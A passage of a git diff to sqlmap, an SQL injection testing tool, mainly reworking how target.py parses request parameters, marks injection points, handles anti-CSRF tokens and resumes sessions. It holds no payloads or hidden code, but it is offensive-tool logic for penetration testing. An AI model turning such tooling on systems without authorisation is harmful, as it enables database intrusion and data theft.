t=.1, e=1, tr=5, stderr=0): y.append(r) else: time.sleep(max((x - time.time()) / tr, 0)) - return ''.join(y) + return b''.join(getBytes(i) for i in y) def send_all(p, data): if not data: return + data = getBytes(data) + while len(data): sent = p.send(data) - data = buffer(data, sent) + if not isinstance(sent, int): + break + data = buffer(data[sent:]) diff --git a/lib/core/target.py b/lib/core/target.py index b66b7bdeef6..3de535f2600 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -1,60 +1,86 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs +import functools import os import re +import subprocess +import sys import tempfile import time -import urlparse from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.common import hashDBRetrieve from lib.core.common import intersect +from lib.core.common import isNumPosStrValue +from lib.core.common import normalizeUnicode +from lib.core.common import openFile from lib.core.common import paramToDict +from lib.core.common import randomStr from lib.core.common import readInput +from lib.core.common import removePostHintPrefix from lib.core.common import resetCookieJar +from lib.core.common import safeStringFormat +from lib.core.common import unArrayizeValue from lib.core.common import urldecode -from lib.core.data import cmdLineOptions +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import mergedOptions from lib.core.data import paths +from lib.core.datatype import InjectionDict from lib.core.dicts import DBMS_DICT from lib.core.dump import dumper from lib.core.enums import HASHDB_KEYS -from lib.core.enums import HTTPHEADER +from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapSyntaxException +from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException +from lib.core.option import _setAuthCred from lib.core.option import _setDBMS from lib.core.option import _setKnowledgeBaseAttributes -from lib.core.option import _setAuthCred +from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX +from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR +from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import HOST_ALIASES +from lib.core.settings import INJECT_HERE_REGEX +from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX from lib.core.settings import JSON_RECOGNITION_REGEX from lib.core.settings import MULTIPART_RECOGNITION_REGEX +from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS from lib.core.settings import REFERER_ALIASES +from lib.core.settings import RESTORE_MERGED_OPTIONS from lib.core.settings import RESULTS_FILE_FORMAT -from lib.core.settings import SOAP_RECOGNITION_REGEX +from lib.core.settings import SESSION_SQLITE_FILE from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import UNENCODED_ORIGINAL_VALUE from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.settings import USER_AGENT_ALIASES +from lib.core.settings import XML_RECOGNITION_REGEX +from lib.core.threads import getCurrentThreadData from lib.utils.hashdb import HashDB -from lib.core.xmldump import dumper as xmldumper -from thirdparty.odict.odict import OrderedDict +from thirdparty import six +from thirdparty.odict import OrderedDict +from thirdparty.six.moves import urllib as _urllib def _setRequestParams(): """ @@ -66,6 +92,7 @@ def _setRequestParams(): conf.parameters[None] = "direct connection" return + hintNames = [] testableParameters = False # Perform checks on GET parameters @@ -79,90 +106,193 @@ def _setRequestParams(): # Perform checks on POST parameters if conf.method == HTTPMETHOD.POST and conf.data is None: - errMsg = "HTTP POST method depends on HTTP data value to be posted" - raise SqlmapSyntaxException(errMsg) + logger.warning("detected empty POST body") + conf.data = "" if conf.data is not None: - conf.method = HTTPMETHOD.POST + conf.method = conf.method or HTTPMETHOD.POST + + def process(match, repl): + retVal = match.group(0) + + if not (conf.testParameter and match.group("name") not in (removePostHintPrefix(_) for _ in conf.testParameter)) and match.group("name") == match.group("name").strip('\\'): + retVal = repl + while True: + _ = re.search(r"\\g<([^>]+)>", retVal) + if _: + try: + retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1))) + except IndexError: + break + else: + break + if kb.customInjectionMark in retVal: + hintNames.append((retVal.split(kb.customInjectionMark)[0], match.group("name").strip('"\'') if kb.postHint == POST_HINT.JSON_LIKE else match.group("name"))) + + return retVal + + if kb.processUserMarks is None and kb.customInjectionMark in conf.data: + message = "custom injection marker ('%s') found in %s " % (kb.customInjectionMark, conf.method) + message += "body. Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + else: + kb.processUserMarks = choice == 'Y' - if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed - pass + if kb.processUserMarks: + kb.testOnlyCustom = True - elif re.search(JSON_RECOGNITION_REGEX, conf.data): - message = "JSON like data found in POST data. " + if re.search(JSON_RECOGNITION_REGEX, conf.data): + message = "JSON data found in %s body. " % conf.method message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = re.sub(r'("[^"]+"\s*:\s*"[^"]+)"', r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, conf.data) - conf.data = re.sub(r'("[^"]+"\s*:\s*)(-?\d[\d\.]*\b)', r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, conf.data) + elif choice == 'Y': kb.postHint = POST_HINT.JSON + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*".*?)"(?%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*")"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) + for match in re.finditer(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data): + if not (conf.testParameter and match.group("name") not in conf.testParameter): + _ = match.group(2) + if kb.customInjectionMark not in _: # Note: only for unprocessed (simple) forms - i.e. non-associative arrays (e.g. [1,2,3]) + _ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _) + _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _) + conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) + + elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): + message = "JSON-like data found in %s body. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.JSON_LIKE + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + if '"' in conf.data: + conf.data = re.sub(r'((?P"[^"]+"|\w+)\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'((?P"[^"]+"|\w+)\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % kb.customInjectionMark), conf.data) + else: + conf.data = re.sub(r"((?P'[^']+'|\w+)\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % kb.customInjectionMark), conf.data) + conf.data = re.sub(r"((?P'[^']+'|\w+)\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % kb.customInjectionMark), conf.data) + + elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): + message = "Array-like data found in %s body. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() - elif re.search(SOAP_RECOGNITION_REGEX, conf.data): - message = "SOAP/XML like data found in POST data. " + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.ARRAY_LIKE + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % kb.customInjectionMark, conf.data) + + elif re.search(XML_RECOGNITION_REGEX, conf.data): + message = "SOAP/XML data found in %s body. " % conf.method message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = re.sub(r"(<([^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR, conf.data) + elif choice == 'Y': kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(<(?P[^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % kb.customInjectionMark), conf.data) elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): - message = "Multipart like data found in POST data. " + message = "Multipart-like data found in %s body. " % conf.method message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = re.sub(r"(?si)(Content-Disposition.+?)((\r)?\n--)", r"\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, conf.data) + elif choice == 'Y': kb.postHint = POST_HINT.MULTIPART + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(?si)(Content-Disposition:[^\n]+\s+name=\"(?P[^\"]+)\"(?:[^f|^b]|f(?!ilename=)|b(?!oundary=))*?)((%s)--)" % ("\r\n" if "\r\n" in conf.data else '\n'), + functools.partial(process, repl=r"\g<1>%s\g<3>" % kb.customInjectionMark), conf.data) + + if not kb.postHint: + if kb.customInjectionMark in conf.data: # later processed + pass + else: + place = PLACE.POST - else: - place = PLACE.POST - - conf.parameters[place] = conf.data - paramDict = paramToDict(place, conf.data) + conf.parameters[place] = conf.data + paramDict = paramToDict(place, conf.data) - if paramDict: - conf.paramDict[place] = paramDict - testableParameters = True + if paramDict: + conf.paramDict[place] = paramDict + testableParameters = True + else: + if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found + conf.parameters[PLACE.POST] = conf.data - kb.processUserMarks = True if kb.postHint else kb.processUserMarks + kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks - if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)): - warnMsg = "you've provided target url without any GET " - warnMsg += "parameters (e.g. www.site.com/article.php?id=1) " + if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"): + warnMsg = "you've provided target URL without any GET " + warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " warnMsg += "and without providing any POST parameters " - warnMsg += "through --data option" - logger.warn(warnMsg) + warnMsg += "through option '--data'" + logger.warning(warnMsg) message = "do you want to try URI injections " - message += "in the target url itself? [Y/n/q] " - test = readInput(message, default="Y") + message += "in the target URL itself? [Y/n/q] " + choice = readInput(message, default='Y').upper() - if not test or test[0] not in ("n", "N"): - conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR) - kb.processUserMarks = True - elif test[0] in ("q", "Q"): + if choice == 'Q': raise SqlmapUserQuitException + elif choice == 'Y': + conf.url = "%s%s" % (conf.url, kb.customInjectionMark) + kb.processUserMarks = True - for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, re.sub(r"\bq=[^;']+", "", str(conf.httpHeaders)))): - if CUSTOM_INJECTION_MARK_CHAR in (value or ""): + for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))): + if place == PLACE.CUSTOM_HEADER and any((conf.forms, conf.crawlDepth)): + continue + + _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or "" + if kb.customInjectionMark in _: if kb.processUserMarks is None: - _ = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer'} - message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR - message += "'%s'. Do you want to process it? [Y/n/q] " % _[place] - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'} + message = "custom injection marker ('%s') found in option " % kb.customInjectionMark + message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place] + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException else: - kb.processUserMarks = not test or test[0] not in ("n", "N") + kb.processUserMarks = choice == 'Y' + + if kb.processUserMarks: + kb.testOnlyCustom = True + + if "=%s" % kb.customInjectionMark in _: + warnMsg = "it seems that you've provided empty parameter value(s) " + warnMsg += "for testing. Please, always use only valid parameter values " + warnMsg += "so sqlmap could be able to run properly" + logger.warning(warnMsg) if not kb.processUserMarks: if place == PLACE.URI: - query = urlparse.urlsplit(value).query + query = _urllib.parse.urlsplit(value).query if query: parameters = conf.parameters[PLACE.GET] = query paramDict = paramToDict(PLACE.GET, parameters) @@ -180,20 +310,33 @@ def _setRequestParams(): testableParameters = True else: + if place == PLACE.URI: + value = conf.url = conf.url.replace('+', "%20") # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5123 + conf.parameters[place] = value conf.paramDict[place] = OrderedDict() if place == PLACE.CUSTOM_HEADER: for index in xrange(len(conf.httpHeaders)): header, value = conf.httpHeaders[index] - if CUSTOM_INJECTION_MARK_CHAR in re.sub(r"\bq=[^;']+", "", value): - conf.paramDict[place][header] = "%s,%s" % (header, value) - conf.httpHeaders[index] = (header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) + if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value): + parts = value.split(kb.customInjectionMark) + for i in xrange(len(parts) - 1): + conf.paramDict[place]["%s #%d%s" % (header, i + 1, kb.customInjectionMark)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts)))) + conf.httpHeaders[index] = (header, value.replace(kb.customInjectionMark, "")) else: - parts = value.split(CUSTOM_INJECTION_MARK_CHAR) + parts = value.split(kb.customInjectionMark) for i in xrange(len(parts) - 1): - conf.paramDict[place]["%s#%d%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts))) + name = None + if kb.postHint: + for ending, _ in hintNames: + if parts[i].endswith(ending): + name = "%s %s" % (kb.postHint, _) + break + if name is None: + name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, kb.customInjectionMark) + conf.paramDict[place][name] = "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts))) if place == PLACE.URI and PLACE.GET in conf.paramDict: del conf.paramDict[PLACE.GET] @@ -203,8 +346,9 @@ def _setRequestParams(): testableParameters = True if kb.processUserMarks: - conf.url = conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "") - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, "") if conf.data else conf.data + for item in ("url", "data", "agent", "referer", "cookie"): + if conf.get(item): + conf[item] = conf[item].replace(kb.customInjectionMark, "") # Perform checks on Cookie parameters if conf.cookie: @@ -217,39 +361,46 @@ def _setRequestParams(): # Perform checks on header values if conf.httpHeaders: - for httpHeader, headerValue in conf.httpHeaders: + for httpHeader, headerValue in list(conf.httpHeaders): # Url encoding of the header values should be avoided # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value - httpHeader = httpHeader.title() - - if httpHeader == HTTPHEADER.USER_AGENT: + if httpHeader.upper() == HTTP_HEADER.USER_AGENT.upper(): conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) if condition: conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue} testableParameters = True - elif httpHeader == HTTPHEADER.REFERER: + elif httpHeader.upper() == HTTP_HEADER.REFERER.upper(): conf.parameters[PLACE.REFERER] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) if condition: conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} testableParameters = True - elif httpHeader == HTTPHEADER.HOST: + elif httpHeader.upper() == HTTP_HEADER.HOST.upper(): conf.parameters[PLACE.HOST] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) if condition: conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue} testableParameters = True + else: + condition = intersect(conf.testParameter, [httpHeader], True) + + if condition: + conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) + conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)} + conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders] + testableParameters = True + if not conf.parameters: errMsg = "you did not provide any GET, POST and Cookie " errMsg += "parameter, neither an User-Agent, Referer or Host header value" @@ -257,24 +408,49 @@ def _setRequestParams(): elif not testableParameters: errMsg = "all testable parameters you provided are not present " - errMsg += "within the GET, POST and Cookie parameters" + errMsg += "within the given request data" raise SqlmapGenericException(errMsg) + if conf.csrfToken: + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}), conf.paramDict.get(PLACE.COOKIE, {}))) and not re.search(r"\b%s\b" % conf.csrfToken, conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}) and not all(re.search(conf.csrfToken, _, re.I) for _ in conf.paramDict.get(PLACE.URI, {}).values()): + errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken._original + errMsg += "found in provided GET, POST, Cookie or header values" + raise SqlmapGenericException(errMsg) + else: + for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE): + if conf.csrfToken: + break + + for parameter in conf.paramDict.get(place, {}): + if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES): + message = "%sparameter '%s' appears to hold anti-CSRF token. " % ("%s " % place if place != parameter else "", parameter) + message += "Do you want sqlmap to automatically update it in further requests? [y/N] " + + if readInput(message, default='N', boolean=True): + class _(six.text_type): + pass + conf.csrfToken = _(re.escape(getUnicode(parameter))) + conf.csrfToken._original = getUnicode(parameter) + break + def _setHashDB(): """ Check and set the HashDB SQLite file for query resume functionality. """ if not conf.hashDBFile: - conf.hashDBFile = conf.sessionFile or "%s%ssession.sqlite" % (conf.outputPath, os.sep) + conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, SESSION_SQLITE_FILE) + + if conf.flushSession: + if os.path.exists(conf.hashDBFile): + if conf.hashDB: + conf.hashDB.closeAll() - if os.path.exists(conf.hashDBFile): - if conf.flushSession: try: os.remove(conf.hashDBFile) logger.info("flushing session file") - except OSError, msg: - errMsg = "unable to flush the session file (%s)" % msg + except OSError as ex: + errMsg = "unable to flush the session file ('%s')" % getSafeExString(ex) raise SqlmapFilePathException(errMsg) conf.hashDB = HashDB(conf.hashDBFile) @@ -285,24 +461,28 @@ def _resumeHashDBValues(): """ kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths - kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars - kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns + kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars + kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable + kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH) + if isNumPosStrValue(kb.errorChunkLength): + kb.errorChunkLength = int(kb.errorChunkLength) + else: + kb.errorChunkLength = None + conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: - if injection.place in conf.paramDict and \ - injection.parameter in conf.paramDict[injection.place]: - - if not conf.tech or intersect(conf.tech, injection.data.keys()): - if intersect(conf.tech, injection.data.keys()): - injection.data = dict(filter(lambda (key, item): key in conf.tech, injection.data.items())) - + if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]: + if not conf.technique or intersect(conf.technique, injection.data.keys()): + if intersect(conf.technique, injection.data.keys()): + injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.technique) if injection not in kb.injections: kb.injections.append(injection) + kb.vulnHosts.add(conf.hostname) _resumeDBMS() _resumeOS() @@ -315,12 +495,18 @@ def _resumeDBMS(): value = hashDBRetrieve(HASHDB_KEYS.DBMS) if not value: - return + if conf.offline: + errMsg = "unable to continue in offline mode " + errMsg += "because of lack of usable " + errMsg += "session data" + raise SqlmapNoneDataException(errMsg) + else: + return dbms = value.lower() dbmsVersion = [UNKNOWN_DBMS_VERSION] - _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search("%s ([\d\.]+)" % _, dbms, re.I) + _ = "(%s)" % ('|'.join(SUPPORTED_DBMS)) + _ = re.search(r"\A%s (.*)" % _, dbms, re.I) if _: dbms = _.group(1).lower() @@ -328,7 +514,7 @@ def _resumeDBMS(): if conf.dbms: check = True - for aliases, _, _ in DBMS_DICT.values(): + for aliases, _, _, _ in DBMS_DICT.values(): if conf.dbms.lower() in aliases and dbms not in aliases: check = False break @@ -339,9 +525,8 @@ def _resumeDBMS(): message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms message += "Do you really want to force the back-end " message += "DBMS value? [y/N] " - test = readInput(message, default="N") - if not test or test[0] in ("n", "N"): + if not readInput(message, default='N', boolean=True): conf.dbms = None Backend.setDbms(dbms) Backend.setVersionList(dbmsVersion) @@ -375,9 +560,8 @@ def _resumeOS(): message += "operating system is %s. " % os message += "Do you really want to force the back-end DBMS " message += "OS value? [y/N] " - test = readInput(message, default="N") - if not test or test[0] in ("n", "N"): + if not readInput(message, default='N', boolean=True): conf.os = os else: conf.os = os @@ -394,24 +578,52 @@ def _setResultsFile(): return if not conf.resultsFP: - conf.resultsFilename = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, time.strftime(RESULTS_FILE_FORMAT).lower()) - conf.resultsFP = codecs.open(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0) - conf.resultsFP.writelines("Target url,Place,Parameter,Techniques%s" % os.linesep) + conf.resultsFile = conf.resultsFile or os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower()) + found = os.path.exists(conf.resultsFile) - logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename) + try: + conf.resultsFP = openFile(conf.resultsFile, "a", UNICODE_ENCODING, buffering=0) + except (OSError, IOError) as ex: + try: + warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFile, getUnicode(ex)) + handle, conf.resultsFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv") + os.close(handle) + conf.resultsFP = openFile(conf.resultsFile, "w+", UNICODE_ENCODING, buffering=0) + warnMsg += "Using temporary file '%s' instead" % conf.resultsFile + logger.warning(warnMsg) + except IOError as _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) + + if not found: + conf.resultsFP.writelines("Target URL,Place,Parameter,Technique(s),Note(s)%s" % os.linesep) + + logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFile) def _createFilesDir(): """ Create the file directory. """ - if not conf.rFile: + if not any((conf.fileRead, conf.commonFiles)): return conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname if not os.path.isdir(conf.filePath): - os.makedirs(conf.filePath, 0755) + try: + os.makedirs(conf.filePath) + except OSError as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapfiles") + warnMsg = "unable to create files directory " + warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) + + conf.filePath = tempDir def _createDumpDir(): """ @@ -421,17 +633,22 @@ def _createDumpDir(): if not conf.dumpTable and not conf.dumpAll and not conf.search: return - conf.dumpPath = paths.SQLMAP_DUMP_PATH % conf.hostname + conf.dumpPath = safeStringFormat(paths.SQLMAP_DUMP_PATH, conf.hostname) if not os.path.isdir(conf.dumpPath): - os.makedirs(conf.dumpPath, 0755) + try: + os.makedirs(conf.dumpPath) + except Exception as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapdump") + warnMsg = "unable to create dump directory " + warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) -def _configureDumper(): - if hasattr(conf, 'xmlFile') and conf.xmlFile: - conf.dumper = xmldumper - else: - conf.dumper = dumper + conf.dumpPath = tempDir +def _configureDumper(): + conf.dumper = dumper conf.dumper.setOutputFile() def _createTargetDirs(): @@ -439,59 +656,60 @@ def _createTargetDirs(): Create the output directory. """ - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - try: - os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) - except OSError, ex: - tempDir = tempfile.mkdtemp(prefix='output') - warnMsg = "unable to create default root output directory " - warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex) - warnMsg += "using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) - - paths.SQLMAP_OUTPUT_PATH = tempDir + conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) - conf.outputPath = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, conf.hostname) + try: + if not os.path.isdir(conf.outputPath): + os.makedirs(conf.outputPath) + except (OSError, IOError, TypeError) as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") + warnMsg = "unable to create output directory " + warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) - if not os.path.isdir(conf.outputPath): - try: - os.makedirs(conf.outputPath, 0755) - except OSError, ex: - tempDir = tempfile.mkdtemp(prefix='output') - warnMsg = "unable to create output directory " - warnMsg += "'%s' (%s). " % (conf.outputPath, ex) - warnMsg += "using temporary directory '%s' instead" % tempDir - 